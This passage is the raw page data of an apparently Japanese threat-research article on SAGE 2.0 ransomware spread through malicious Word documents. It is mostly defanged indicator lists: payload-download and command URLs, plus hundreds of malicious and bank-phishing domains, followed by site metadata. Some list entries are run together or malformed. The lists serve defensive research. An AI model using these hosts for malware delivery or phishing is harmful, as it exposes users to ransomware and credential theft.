homern[.]top\/read.php?f=0.dat\r\nhxxp:\/\/www.ddoeroole[.]top\/read.php?f=0.dat\r\nhxxp:\/\/www.doomgamesoa[.]top\/read.php?f=0.dat\r\nhxxp:\/\/www.johnsnowz[.]top\/read.php?f=0.dat\r\nhxxp:\/\/www.kiselalloe[.]top\/read.php?f=0.dat\r\nhxxp:\/\/www.nnapoakea[.]top\/read.php?f=0.dat\r\nhxxp:\/\/www.qwatrojohn[.]top\/read.php?f=0.dat\r\nhxxp:\/\/www.soonhalia[.]top\/read.php?f=0.dat\r\nhxxp:\/\/zonexxopera[.]top\/read.php?f=0.dat\r\nhxxp:\/\/bestflowstou[.]wang\/search.php\r\nhxxp:\/\/bogidoggy[.]top\/search.php\r\nhxxp:\/\/cocalolo[.]top\/search.php\r\nhxxp:\/\/cometogod[.]top\/search.php\r\nhxxp:\/\/dogtosamdnc[.]top\/search.php\r\nhxxp:\/\/dpolly-dolly[.]top\/search.php\r\nhxxp:\/\/flowers-my[.]wang\/search.php\r\nhxxp:\/\/lislissli[.]wang\/search.php\r\nhxxp:\/\/lolotocoporo[.]wang\/search.php\r\nhxxp:\/\/moonshards[.]top\/search.php\r\nhxxp:\/\/panntyplenty[.]top\/search.php\r\nhxxp:\/\/randoz-pandom[.]wang\/search.php\r\nhxxp:\/\/roggistazli[.]top\/search.php\r\nhxxp:\/\/sonnystafgy[.]top\/search.php\r\nhxxp:\/\/sun2u[.]top\/search.php\r\nhxxp:\/\/tolleyfrvdy[.]wang\/search.php\r\nhxxp:\/\/transporingsytw[.]wang\/search.php\r\nhxxp:\/\/travelsserts[.]wang\/search.php\r\nhxxp:\/\/trendsnonstop[.]top\/search.php\r\nhxxp:\/\/truepokemonant[.]top\/search.php\r\nhxxp:\/\/trustedfoevery[.]top\/search.php\r\nhxxp:\/\/trustgovnet[.]top\/search.php\r\nhxxp:\/\/truthforeyoue[.]top\/search.php\r\nhxxp:\/\/zussipussicscds[.]top\/search.php\r\nhxxp:\/\/rootaleyz[.]top\/read.php?f=1.dat\r\nhxxp:\/\/doconlineaof[.]top\/read.php?f=404\r\nhxxp:\/\/doclosegoa[.]top\/read.php?f=404\r\nhxxp:\/\/fooperight[.]top\/read.php?f=404\r\nhxxp:\/\/mondayhelthc[.]top\/read.php?f=404\r\nhxxp:\/\/qopahighk[.]top\/read.php?f=404\r\nhxxp:\/\/coolzeropa[.]top\/admin.php?f=0.dat\r\nhxxp:\/\/fooperight[.]top\/admin.php?f=0.dat\r\nhxxp:\/\/www.hometowergop[.]top\/admin.php?f=1.jpg\r\nhxxp:\/\/tomyyplayde[.]com\/read.php?f=3.dat\r\nhxxp:\/\/1topfllrt[.]top\/admin.php?f=1.exe\r\n\r\n<\/pre>\n\u5217\u6319\u3055\u308c\u305f\u30c9\u30e1\u30a4\u30f3:<\/p>\n
1478520[.]top\r\n1topfllrt[.]top\r\n2by[.]in\r\n2tiotio[.]top\r\n76ingbf[.]top\r\n823ad893992[.]top\r\n828347d8923[.]top\r\naaaaaar[.]info\r\nabortppier[.]top\r\nacotooptih[.]top\r\nadiidiam[.]top\r\nadrena123[.]in\r\nadvertisingspace[.]co.in\r\naeropoer[.]top\r\nagiflecnefd[.]bid\r\naktualisierung-4772618[.]com\r\naktualisierung377483[.]com\r\naloepolera[.]top\r\naloesantanewd[.]top\r\namericarneexpress[.]com\r\namhstcorp[.]net\r\nanotherone[.]in\r\naoopoerope[.]top\r\nargequdogsdh[.]net\r\nasecwitlecn[.]bid\r\nasmeraled[.]top\r\nasot77554best[.]net\r\nassassination[.]top\r\nastalavistalol[.]info\r\nastrosean[.]top\r\natonement[.]top\r\nau-netbank[.]top\r\nbarbossshoping[.]info\r\nbarclaycardsecure[.]de\r\nbarclayscardsecure[.]com\r\nbareknuckle[.]top\r\nbattterlog[.]info\r\nbbmvnduweeigjaj[.]com\r\nbe4jump[.]in\r\nbe4jump2[.]in\r\nbe4jump3[.]in\r\nbe4jump3ns[.]in\r\nbeforeyougogg[.]net\r\nbestflowstou[.]wang\r\nbestpromoz[.]com\r\nbesttraffic[.]in\r\nbetastemp[.]net\r\nbinaryoptions12000[.]top\r\nbinaryoptions15000[.]top\r\nblablacarhello[.]in\r\nbloodsucker[.]top\r\nbobobmdola[.]top\r\nbogidoggy[.]top\r\nbogtdrfdeqabyyxdg[.]net\r\nbolshedelatnebudustakimraskaldom[.]top\r\nbonsafety[.]info\r\nbrobrodns[.]com\r\nbrothjoney[.]net\r\nbrowseradvssafe[.]com\r\nbtcc-hr[.]com\r\nbuttonart[.]xyz\r\ncba0012[.]top\r\ncesaronefew[.]top\r\nchildgura[.]in\r\nchina-mama[.]top\r\nchinarobotop[.]top\r\nchinasufffppotyshopr[.]top\r\nchinasuppotychinasuppotynysgchinasuppotwgiftst[.]top\r\nchinatopshopsop[.]top\r\nchistmaasst[.]top\r\nchjjjjkkkka[.]top\r\nchouscarr[.]in\r\nchowlmail[.]com\r\nchristmaasnd[.]top\r\nchristmaasrd[.]top\r\nchwangostopos[.]top\r\nclubsocial[.]in\r\ncocacolachocolate[.]pw\r\ncocalolo[.]top\r\ncococpopo[.]co.in\r\ncom-au-netbank[.]top\r\ncom-au[.]top\r\ncom-au1[.]top\r\ncom-au2[.]top\r\ncom-au3[.]top\r\ncometogod[.]top\r\ncomfortoflop[.]info\r\ncommbank-com[.]top\r\ncomolocko[.]co.in\r\ncookietroopodal[.]wang\r\ncoolzeropa[.]top\r\ncopiesnd[.]top\r\ncopiesst[.]top\r\ncreativeparty[.]info\r\ncsscheckregs[.]info\r\ncunumlicgaf[.]bid\r\ncustomclientservicesresponders[.]net\r\ncyberdomain[.]in\r\nczetcoola[.]top\r\ndaimoidomainemne[.]info\r\ndandyhomern[.]top\r\ndbftnty456ffff[.]top\r\nddoeroole[.]top\r\ndecontamination[.]top\r\ndecryptdecryptdec\r\ndecrypt-me[.]info\r\ndefectiveduryou[.]com\r\ndendro469[.]in\r\nderirreynd[.]top\r\nderirreyst[.]top\r\nderyu[.]in\r\ndisfigured[.]top\r\ndislikable[.]top\r\ndnsmixbussiness[.]info\r\ndoc4tolllcp[.]top\r\ndoclosegoa[.]top\r\ndoconlineaof[.]top\r\ndogtosamdnc[.]top\r\ndokfooazer[.]top\r\ndoktor-wilhelm-vonberg[.]top\r\ndolceitaliaz[.]topdolceitrop.top\r\ndomadomdomaine[.]com\r\ndomailpost[.]com\r\ndomaindomain\r\ndomanbomba[.]biz\r\ndomaseagov[.]biz\r\ndomenpofigkakoi[.]in\r\ndonasongl[.]top\r\ndonbassnoloveukraine[.]com\r\ndondokier[.]top\r\ndonner-wetter-info[.]top\r\ndoomgamesoa[.]top\r\ndorotycoockingbooks[.]com\r\ndosehoop[.]top\r\ndpolly-dolly[.]top\r\ndsmmercoulda[.]top\r\ndwarees[.]in\r\ne2otoopcpr[.]top\r\neasy-money10000[.]top\r\neasy-money20000[.]top\r\nentrails[.]net\r\nerrorfola[.]top\r\nescapegasmech[.]com\r\nf4s[.]in\r\nfabianwosarfreeporn[.]com\r\nfbaccessform[.]com\r\nficnecwxpqwftazmlck[.]info\r\nfile4hosti[.]info\r\nfinestololoki[.]top\r\nfinishirenemoflexvathard[.]com\r\nfirstdomain[.]in\r\nfitnesscoffee[.]biz\r\nfive5lesson[.]top\r\nfivethreemotherfatherdogcat[.]pw\r\nfjkshksd3[.]in\r\nflava-lava[.]in\r\nflowers-my[.]wang\r\nfoolewhot[.]top\r\nfooperight[.]top\r\nforthehnms[.]top\r\nfortinsto[.]com\r\nfortycooofortycoooforelworld[.]top\r\nfraujenod[.]fraujenolorelab.wang\r\nfreditt[.]net\r\nfreealphadns[.]top\r\ngdemoidomaine[.]info\r\ngerbmail[.]com\r\ngerbpost[.]com\r\ngetintogamefast[.]net\r\ngetns54tope[.]top\r\ngetthisshitxxxx[.]in\r\ngloballlns[.]in\r\ngodderyki[.]in\r\ngolodoomam[.]top\r\ngoodfoodprod[.]xyz\r\ngoodsdnss[.]info\r\ngooggaol[.]top\r\ngooholtan[.]wang\r\ngoonricerwiththat[.]in\r\ngosharubchinskiy[.]xyz\r\ngplayappapi[.]com\r\nguillotine[.]top\r\nhboodemyjeepingforlivevinil[.]com\r\nhometowergop[.]top\r\nhookup3333[.]top\r\nhookup4444[.]top\r\nhootholoj[.]top\r\nhostingdnsnew[.]top\r\nhostmicrosoftstat[.]in\r\nhq2uoy[.]top\r\nhqrelaction[.]top\r\nhqrelation[.]top\r\nhqtopof[.]info\r\nhqtopon[.]info\r\nhqtrssx[.]top\r\nhqttph[.]top\r\nhqttpq[.]top\r\nhtpthg[.]top\r\nhttphqs[.]top\r\nhttsps[.]top\r\nid2810id2810top-sities[.]co.in\r\nid8342[.]wang\r\nidontlikeyoumister[.]in\r\nigoodsnd[.]wang\r\nigoodsst[.]top\r\nilisioni-sys[.]top\r\nimbharattu[.]info\r\nincsdnsnets[.]com\r\nincsdnsnets[.]top\r\nincsnetregsdns[.]com\r\nincsnetworksupdate[.]com\r\ninfonetsworks[.]top\r\ninfosharespoints[.]info\r\ning-ing[.]top\r\ningaso[.]in\r\nintensegoal[.]com\r\nintrofastnet[.]com\r\njalivaliboom[.]in\r\njamspune26[.]top\r\njobbelopa[.]top\r\njohnsnowz[.]top\r\njosdejsdhfds[.]info\r\njquery-cdn[.]info\r\nkaiser-schnitt-achse[.]top\r\nkarachark[.]com\r\nkinanasi[.]in\r\nkiselalloe[.]top\r\nkledwdjvfklopcopdcjsdfdqlkweqwljrquriepewewqrufjcladqpiomzzds[.]top\r\nkylosolerkylosolerkylosmuvyczkylosolerkylolabackars[.]com\r\nlastdomain[.]in\r\nledybkbgbdmkmblsfrght[.]top\r\nleveluse[.]in\r\nlicfilesmaypreventworky[.]com\r\nlightwebdns[.]top\r\nlislissli[.]wang\r\nlollyoff[.]info\r\nlollyonn[.]info\r\nlolotocoporo[.]wang\r\nlootday[.]com\r\nlpocedonajuzjgankvmh[.]com\r\nlusidji[.]com\r\nlutrinzcourse[.]pw\r\nmail4host[.]xyz\r\nmailoffise[.]com\r\nmairuciontri[.]com\r\nmakemoneypearse[.]pw\r\nmamkuvashubla[.]top\r\nmartuswalmart[.]pw\r\nmegadating333[.]top\r\nmegahookup222[.]com\r\nmegatraffic[.]in\r\nmegmegmegmegmegmp\r\nmemyselfandi[.]in\r\nmicrosoftsecuritycheck[.]info\r\nmicrosoftstat[.]in\r\nmicrotexregset[.]net\r\nmicrotexregy[.]in\r\nmicrotexregy[.]net\r\nmicrotexregyts[.]net\r\nmicrotixrygyt[.]top\r\nmicrotixrygyt[.]wang\r\nmicsowebpoints[.]net\r\nmij-ing[.]in\r\nminiparkingdns[.]in\r\nminkeratingolard[.]pw\r\nmirumirvoinepipiska[.]com\r\nmisshapen[.]top\r\nmomomomomomp\r\nmondayhelthc[.]top\r\nmoneyhoneypff[.]top\r\nmonterohojer[.]top\r\nmoonshards[.]top\r\nmoskow1[.]co.imoskow1.co..topmoskow1.co.op\r\nmpstxserv[.]net\r\nmshosting[.]in\r\nmuesli-information-basar[.]top\r\nmusic1bestfashions[.]top\r\nmustlive111[.]info\r\nmydomainebizness[.]info\r\nmyprivns[.]net\r\nnadomanebro[.]info\r\nneboltay[.]in\r\nnejptogvqehjopcnmd[.]wang\r\nnetincsworks[.]top\r\nnetkeycompany[.]com\r\nnetsworksincs[.]com\r\nnetsworksincs[.]top\r\nnetsworksincs[.]wang\r\nnetworkdnsinc[.]com\r\nnetworksinform[.]top\r\nnewbizdoor[.]info\r\nnewfoodas[.]top\r\nnewgiftnd[.]wang\r\nnewgiftrd[.]top\r\nnewusnewus8[.]in\r\nnewyear2016happy[.]in\r\nnewyear2016shop[.]info\r\nnewyeargoka[.]top\r\nnfsudhwer[.]in\r\nnintedrer[.]nintedrerolld.top\r\nnnapoakea[.]top\r\nnobelagrow[.]top\r\nnoviednshost[.]in\r\nns0system[.]top\r\nns54534[.]top\r\nns9898007jiji[.]top\r\nnsgonsgonsgonsgoniretes2dreadds[.]info\r\nnudlle7316[.]top\r\nnurgibordo[.]top\r\nnyrgoodsnd[.]top\r\nnyrgoodsrd[.]top\r\nnyrgoodsst[.]top\r\noceanstopla[.]top\r\noesterreich-kreditkarte-sicherheit-entsperrung[.]com\r\noesterreich-kreditkarte-sicherheit[.]com\r\nofficepst[.]com\r\nohimyfriendff[.]net\r\nololololololo[.]in\r\nonlyderalof[.]info\r\nonlyloopri[.]top\r\nonpzjbvxnbvuhrjbjb[.]info\r\nordersnd[.]top\r\nordersst[.]top\r\nourson-fat[.]wang\r\npabstats1name[.]pabstats1name.ptypabstats1nrus.co.in\r\npapapapapapapapapapapa[.]top\r\nparkingbudettut[.]in\r\nparkingdnsdomaine[.]info\r\nparkingdnsdomane[.]in\r\nparkinghosst[.]info\r\nparkinghostdnsdomaine[.]in\r\nparkinghostdnsdomaine[.]info\r\nparkinghostdomaine[.]in\r\npaydaybitch[.]com\r\npfnstest[.]co.in\r\npftest1[.]in\r\npiggyforunms[.]top\r\npigkebabnms[.]top\r\npininstitute[.]top\r\npiratedreed[.]com\r\npiratedreed22[.]info\r\npopopyagkie[.]in\r\npoooperfath[.]top\r\nporticutpof[.]info\r\nporticutoon[.]info\r\npostbodaw[.]top\r\nposterlind[.]in\r\npresquerstinuen[.]info\r\nprocrd1[.]in\r\nprolinesys[.]net\r\npromosuneed[.]com\r\npyshbzdhjsqywonpmvfbtx[.]org\r\nqedramail[.]com\r\nqoee3cool[.]top\r\nqopahighk[.]top\r\nqpeiiqowfqcsuodjfwlkdeqwoeiqeufdsclksx12481321894713141231242[.]top\r\nqqonof[.]info\r\nqqonon[.]info\r\nqudrapost[.]com\r\nqwatrojohn[.]top\r\nrandoz-pandom[.]wang\r\nranumseh[.]bid\r\nraskladushin[.]com\r\nratatujmedia[.]net\r\nreabilitymasreabilitymasraco[.]biz\r\nrealdiggerons[.]com\r\nregisterfit[.]biz\r\nreinstallcomos[.]in\r\nrejoincomp2[.]in\r\nresoneooooee[.]co.in\r\nresourceclick[.]pw\r\nroggistazli[.]top\r\nrokklerte[.]top\r\nrootaleyz[.]top\r\nrootplacecomndeelotoswelcome[.]pw\r\nrrrrrrrrrrrrp\r\nroverstop[.]wang\r\nrrtti[.]in\r\nrtest-blog-unity[.]top\r\nsafeandsound-files[.]info\r\nsaferymywong[.]com\r\nsaigastoun[.]in\r\nsalesnd[.]top\r\nsalesst[.]top\r\nsallykandymandy[.]top\r\nsavedlifes[.]net\r\nsceeder[.]in\r\nscotiaonlinescotiabankinstantsupport[.]com\r\nscotiaonlinescotiabankinstantunlock[.]com\r\nscotiaonlinescotiabankinstantupdate[.]com\r\nscotiaonlinescotiabankinstantscoties[.]com\r\nscotiaonlinescotiabankliveupdate[.]com\r\nscotiaonlinescotiabankliveupdates[.]com\r\nscotiaonlinescotiabanksecurityupdates[.]com\r\nscotiaonlinescotiabankservicehelp[.]com\r\nscotiaonlinescotiabanksystemupdate[.]com\r\nscotiaonlinescotiabanksystemupdates[.]com\r\nscotiaonlinescotiabanktechdepartment[.]com\r\nscscscscscscscscsabanscscscscscscscs[.]com\r\nseafoodol[.]top\r\nsecurin-gmail[.]com\r\nsecurity-amerilcanexpress[.]online\r\nsecuritydep[.]top\r\nsecurityprotect[.]top\r\nsecurityrenew[.]top\r\nsecurityupdates1[.]top\r\nsecurityverification[.]top\r\nsenchar[.]biz\r\nsenttond[.]top\r\nsenttost[.]top\r\nserver1622[.]com\r\nservtglg[.]top\r\nsexygirls1000[.]top\r\nsexygirls5000[.]top\r\nsexyhousefa[.]top\r\nshamks[.]top\r\nshpointvsdoc[.]topshpointvsdoc.topshp.top\r\nsicherheit-deutschland-kundenservice[.]top\r\nsichesichesichesichend-verifizierun[.]com\r\nsilverjinoz[.]net\r\nsix6night[.]top\r\nskjdf3[.]in\r\nsmallstare[.]co.in\r\nsmoeroota[.]top\r\nsoftwarecomparel[.]org\r\nsome123loader[.]in\r\nsome123loader2[.]in\r\nsome123loadersoin\r\nsome123ns[.]in\r\nsome777ns[.]in\r\nsonnystafgy[.]top\r\nsonyponytopc[.]top\r\nsoonhalia[.]top\r\nsosbopera[.]top\r\nsositreyey[.]in\r\nsoul-host[.]top\r\nspartaks1[.]in\r\nspartaks1ns[.]co.in\r\nspartanstets1[.]co.in\r\nss20host[.]in\r\nssoperahotie[.]top\r\nstafcyrerio[.]top\r\nstartytaldi[.]top\r\nsteelscreep[.]in\r\nsun2u[.]top\r\nsuperdnsdomanie[.]top\r\nsupermojo[.]co.in\r\nsupremediet[.]xyz\r\nsusiku[.]info\r\nsutraponef[.]top\r\nsyndiesamberton[.]in\r\nteeuutieore[.]top\r\ntest-test-test[.]ttest-eaktalao.co.in\r\ntestidoalkas[.]top\r\ntesygokkao[.]top\r\nthebestlive7website[.]top\r\ntimetobuymlw[.]in\r\ntimetostart[.]in\r\ntoagoores[.]top\r\ntolacnoms[.]bid\r\ntolleyfrvdy[.]wang\r\ntomyyplayde[.]com\r\ntonsxxxportal[.]com\r\ntoplooneytopwe[.]info\r\ntotalonedk[.]top\r\ntrafred[.]com\r\ntransponitieswan[.]top\r\ntransporingsytw[.]wang\r\ntravelcompru[.]com\r\ntravelsserts[.]wang\r\ntraveltotre[.]in\r\ntravimzukov[.]in\r\ntreetopzxxtredtyu[.]wang\r\ntrendsnonstop[.]top\r\ntrentil[.]top\r\ntrevorblyatopyat[.]com\r\ntruepokemonant[.]top\r\ntrustedfoevery[.]top\r\ntrustgovnet[.]top\r\ntruthforeyoue[.]top\r\ntruthtrustrehl[.]wang\r\ntryfriedpot[.]co.in\r\ntrytond[.]top\r\ntrytost[.]wang\r\nuepolicae[.]top\r\nujnhg[.]top\r\nunited-solutions[.]top\r\nunlock-me[.]info\r\nunlockmeifucan[.]com\r\nupdate447182[.]com\r\nupdatedmicrosoftoffi1e[.]com\r\nupdatemicrosoftoffi1e[.]com\r\nurtafk[.]top\r\nvad987n[.]top\r\nverificationcustomers[.]top\r\nverifizierung23838493[.]top\r\nverifizierung23857392[.]biz\r\nverifizierung23857392verifizierungerung317738448[.]net\r\nverifizierung4437212[.]com\r\nverifizierung887382[.]net\r\nvillingstream[.]pw\r\nvirtualbrake[.]pw\r\nvofjvkawq[.]org\r\nvollyuper[.]top\r\nvoravatest1[.]in\r\nvoravatest1ns[.]co.in\r\nvoravatest2[.]wang\r\nwaltergreen[.]pw\r\nwandnsmonaine[.]com\r\nwang-tuang-imbiss[.]top\r\nwebsinfonetwork[.]top\r\nwebsnetworks[.]top\r\nweiter-zur-bank[.]biz\r\nweiter-zur-bank[.]top\r\nweiterleitung-an-bank[.]com\r\nweiterleitung-zur-bank[.]biz\r\nwerenordic[.]net\r\nwestern-blogger-don[.]top\r\nwesterunion[.]top\r\nwhitexmppdns[.]pw\r\nwhoesworld[.]info\r\nwindowsuser8212[.]in\r\nwiopollbuy[.]biz\r\nwolfstreet[.]site\r\nwonderworlddd[.]top\r\nworkmailmix[.]in\r\nworkthchangecompi[.]com\r\nworldtravelbiz[.]xyz\r\nwortenopdoom[.]info\r\nwrkoolegedd[.]top\r\nxoejyyhoncfdvdgzxe[.]top\r\nxokealevx[.]top\r\nyalitest1[.]in\r\nyalitest2[.]in\r\nyalitest3[.]info\r\nyalitest4[.]info\r\nyandex-sec[.]biz\r\nyobakroba[.]com\r\nyoutoof[.]info\r\nyoutoon[.]info\r\nzaebalilochitsuki[.]info\r\nzaebalimatvashu[.]top\r\nzaparkuidomen[.]in\r\nzarpathalle[.]top\r\nzassman[.]org\r\nzazer[.]info\r\nzaznavalkaktoya[.]com\r\nzdoroviedoma[.]in\r\nzenoproxy[.]org\r\nzinacheaploe[.]top\r\nzombiedoomq[.]top\r\nzonexxopera[.]top\r\nzoomfoolers[.]top\r\nzussipussicscds[.]top\r\nzzgooglryesf[.]top\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"\u6982\u8981 \u6700\u8fd1\u306e\u60aa\u610f\u306e\u3042\u308bMicrosoft Word\u6587\u66f8\u3092\u5206\u6790\u4e2d\u306b\u3001\u3053\u306e\u6587\u66f8\u304c\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u4e9c\u7a2e\u306e\u201cSAGE 2.0\u201d(Sage Locker)\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u307e\u3057\u305f\u3002\u3053\u306e\u4e9c\u7a2e\u306fCryLocker\u304b\u3089\u6d3e\u751f\u3057\u305f\u3082\u306e\u3067\u3059\u3002\u3053\u306e<\/p>\n","protected":false},"author":135,"featured_media":104006,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[4321,3057,4428],"tags":[5229,7444,6391],"product_categories":[],"coauthors":[422],"class_list":["post-106674","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-threat-research","category-ransomware-ja","category-threat-research-ja","tag-crylock-ja","tag-sage-2-0","tag-threat-research-ja"],"yoast_head":"\n
\u60aa\u610f\u306e\u3042\u308b\u6587\u66f8\u3092\u80b2\u3066\u3066\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u3092\u89e3\u660e\u3059\u308b<\/title>\n<meta name=\"description\" content=\"\u6982\u8981 \u6700\u8fd1\u306e\u60aa\u610f\u306e\u3042\u308bMicrosoft Word\u6587\u66f8\u3092\u5206\u6790\u4e2d\u306b\u3001\u3053\u306e\u6587\u66f8\u304c\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u4e9c\u7a2e\u306e\u201cSAGE 2.0\u201d(Sage\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-farming-malicious-documents-unravel-ransomware\/\" \/>\n<meta property=\"og:locale\" content=\"ja_JP\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\u60aa\u610f\u306e\u3042\u308b\u6587\u66f8\u3092\u80b2\u3066\u3066\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u3092\u89e3\u660e\u3059\u308b\" \/>\n<meta property=\"og:description\" content=\"\u6982\u8981 \u6700\u8fd1\u306e\u60aa\u610f\u306e\u3042\u308bMicrosoft Word\u6587\u66f8\u3092\u5206\u6790\u4e2d\u306b\u3001\u3053\u306e\u6587\u66f8\u304c\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u4e9c\u7a2e\u306e\u201cSAGE 2.0\u201d(Sage\" \/>\n<meta property=\"og:url\" content=\"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-farming-malicious-documents-unravel-ransomware\/\" \/>\n<meta property=\"og:site_name\" content=\"Unit 42\" \/>\n<meta property=\"article:published_time\" content=\"2017-01-27T21:00:51+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2020-04-22T06:10:05+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/unit42-web-banner-650x300-1.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"650\" \/>\n\t<meta property=\"og:image:height\" content=\"300\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Jeff White\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"\u60aa\u610f\u306e\u3042\u308b\u6587\u66f8\u3092\u80b2\u3066\u3066\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u3092\u89e3\u660e\u3059\u308b","description":"\u6982\u8981 \u6700\u8fd1\u306e\u60aa\u610f\u306e\u3042\u308bMicrosoft Word\u6587\u66f8\u3092\u5206\u6790\u4e2d\u306b\u3001\u3053\u306e\u6587\u66f8\u304c\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u4e9c\u7a2e\u306e\u201cSAGE 2.0\u201d(Sage","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-farming-malicious-documents-unravel-ransomware\/","og_locale":"ja_JP","og_type":"article","og_title":"\u60aa\u610f\u306e\u3042\u308b\u6587\u66f8\u3092\u80b2\u3066\u3066\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u3092\u89e3\u660e\u3059\u308b","og_description":"\u6982\u8981 \u6700\u8fd1\u306e\u60aa\u610f\u306e\u3042\u308bMicrosoft Word\u6587\u66f8\u3092\u5206\u6790\u4e2d\u306b\u3001\u3053\u306e\u6587\u66f8\u304c\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u4e9c\u7a2e\u306e\u201cSAGE 2.0\u201d(Sage","og_url":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-farming-malicious-documents-unravel-ransomware\/","og_site_name":"Unit 42","article_published_time":"2017-01-27T21:00:51+00:00","article_modified_time":"2020-04-22T06:10:05+00:00","og_image":[{"width":650,"height":300,"url":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/unit42-web-banner-650x300-1.jpg","type":"image\/jpeg"}],"author":"Jeff White","twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-farming-malicious-documents-unravel-ransomware\/#article","isPartOf":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-farming-malicious-documents-unravel-ransomware\/"},"author":{"name":"Jeff White","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/32ecb81b6d2fc5ba9e630880df6a8184"},"headline":"\u60aa\u610f\u306e\u3042\u308b\u6587\u66f8\u3092\u80b2\u3066\u3066\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u3092\u89e3\u660e\u3059\u308b","datePublished":"2017-01-27T21:00:51+00:00","dateModified":"2020-04-22T06:10:05+00:00","mainEntityOfPage":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-farming-malicious-documents-unravel-ransomware\/"},"wordCount":98,"commentCount":0,"image":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-farming-malicious-documents-unravel-ransomware\/#primaryimage"},"thumbnailUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/unit42-web-banner-650x300-1.jpg","keywords":["CryLock","Sage 2.0","threat research"],"articleSection":["Threat Research","\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2","\u8105\u5a01\u30ea\u30b5\u30fc\u30c1"],"inLanguage":"ja","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-farming-malicious-documents-unravel-ransomware\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-farming-malicious-documents-unravel-ransomware\/","url":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-farming-malicious-documents-unravel-ransomware\/","name":"\u60aa\u610f\u306e\u3042\u308b\u6587\u66f8\u3092\u80b2\u3066\u3066\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u3092\u89e3\u660e\u3059\u308b","isPartOf":{"@id":"https:\/\/unit42.paloaltonetworks.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-farming-malicious-documents-unravel-ransomware\/#primaryimage"},"image":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-farming-malicious-documents-unravel-ransomware\/#primaryimage"},"thumbnailUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/unit42-web-banner-650x300-1.jpg","datePublished":"2017-01-27T21:00:51+00:00","dateModified":"2020-04-22T06:10:05+00:00","author":{"@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/32ecb81b6d2fc5ba9e630880df6a8184"},"description":"\u6982\u8981 \u6700\u8fd1\u306e\u60aa\u610f\u306e\u3042\u308bMicrosoft Word\u6587\u66f8\u3092\u5206\u6790\u4e2d\u306b\u3001\u3053\u306e\u6587\u66f8\u304c\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u4e9c\u7a2e\u306e\u201cSAGE 2.0\u201d(Sage","breadcrumb":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-farming-malicious-documents-unravel-ransomware\/#breadcrumb"},"inLanguage":"ja","potentialAction":[{"@type":"ReadAction","target":["https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-farming-malicious-documents-unravel-ransomware\/"]}]},{"@type":"ImageObject","inLanguage":"ja","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-farming-malicious-documents-unravel-ransomware\/#primaryimage","url":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/unit42-web-banner-650x300-1.jpg","contentUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/unit42-web-banner-650x300-1.jpg","width":650,"height":300},{"@type":"BreadcrumbList","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-farming-malicious-documents-unravel-ransomware\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/unit42.paloaltonetworks.com\/ja\/"},{"@type":"ListItem","position":2,"name":"\u60aa\u610f\u306e\u3042\u308b\u6587\u66f8\u3092\u80b2\u3066\u3066\u30e